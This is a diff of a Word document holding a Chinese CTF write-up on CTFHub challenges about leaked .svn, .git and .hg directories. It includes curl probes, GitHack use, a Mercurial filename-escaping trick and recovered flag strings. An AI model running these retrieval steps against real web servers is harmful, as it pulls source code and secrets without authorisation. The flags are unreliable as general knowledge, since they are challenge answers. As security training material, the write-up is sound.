-        <w:t>pristine/&lt;sha1前2位&gt;/&lt;sha1&gt;.svn-base</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>1.7+ 打法（实测）：</w:t>
+        <w:t>cd dist/challenge-f853c2afa0df69bb.sandbox.ctfhub.com_10800</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3535,7 +2239,82 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>curl -o wc.db "$T/.svn/wc.db"</w:t>
+        <w:t>ls                                   # 50x.html  index.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>判据</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">：reflog 变成 4 条，多出来的那行是 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>reset: moving to HEAD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>；</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>refs/stash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 返回 200。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>补一条取 flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3549,7 +2328,55 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>sqlite3 wc.db "SELECT checksum, size, refcount FROM PRISTINE;"</w:t>
+        <w:t>git stash show -p</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ctfhub{03f0f3f844084d7134cedad3}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>题目 3 · Git Index</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3563,7 +2390,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>#   $sha1$bf45c36a... | 221 | 1     ← 还在用</w:t>
+        <w:t>T="http://challenge-xxx:10800"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3577,88 +2404,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>#   $sha1$0b4474e3... |  33 | 0     ← ★ 被删掉的旧版本</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`refcount = 0` = 没有任何工作副本文件引用它 = 被删掉的旧版本残留。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>⚠️ 只看 `NODES` 会漏</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：被删的文件 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>presence='not-present'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>checksum</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 为空。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>四行版：</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3672,7 +2418,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>T="http://challenge-xxx:10800"</w:t>
+        <w:t># ────────── 探测（4 条）──────────</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3686,7 +2432,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>curl -o wc.db "$T/.svn/wc.db"</w:t>
+        <w:t>curl -s "$T/.git/HEAD"                                          # ① 是 git 吗</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3700,7 +2446,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>for h in $(sqlite3 wc.db "SELECT checksum FROM PRISTINE;" | sed 's/\$sha1\$//'); do</w:t>
+        <w:t>curl -s "$T/.git/logs/HEAD" | sed 's/.*\t//'                    # ② 看剧情</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3714,7 +2460,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">  curl -s "$T/.svn/pristine/${h:0:2}/${h}.svn-base"</w:t>
+        <w:t>curl -s -o /dev/null -w "%{http_code}\n" "$T/.git/refs/stash"   # ③ 有 stash 吗</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3728,7 +2474,917 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>done | grep -a ctfhub</w:t>
+        <w:t>curl -s -o /dev/null -w "%{http_code}\n" "$T/.git/objects/"     # ④ 403→GitHack / 200→wget</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t># ────────── 搬运（2 条）──────────</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>python2 ~/tools/githack/GitHack-master/GitHack.py "$T/.git/"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>cd ~/tools/githack/GitHack-master/dist/$(ls -t ~/tools/githack/GitHack-master/dist/ | head -1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t># ────────── 挖（4 条全打，5 秒）──────────</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>ls &amp;&amp; cat *.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>git log --all -p | grep -i ctfhub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>git stash show -p</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>git diff --cached</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>判据</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>git diff --cached</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 有输出 = index 里有 HEAD 没有的文件（flag 从没被 commit 过）。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">：本地复刻 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>flag{index_staged_never_committed}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>（CTFHub 该实例未留记录）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>题目 4 · HG（Mercurial）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>T="http://challenge-xxx:10800"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t># ① 探测</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t># ② 拿文件名（dirstate 里 strings）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>curl -s "$T/.hg/dirstate" | strings | grep -E '\.(txt|php|py)$'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t># ③ 关键：名字里的 _ 变成 __</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>#    flag_807728508.txt  →  flag__807728508.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t># ④ 取内容 + 抓 flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>curl -s "$T/.hg/store/data/flag__807728508.txt.i" | grep -ao 'ctfhub{[^}]*}'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>判据</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>/.hg/requires</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 返回 200。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>两个关键</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">：文件名里的 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 要写成 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>__</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">；revlog 首字节 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>'u'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>(0x75) 表示是原文不是 zlib。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ctfhub{9260b70ead69a60fb2e0d968}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>补充：`.git` 里到底有什么</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
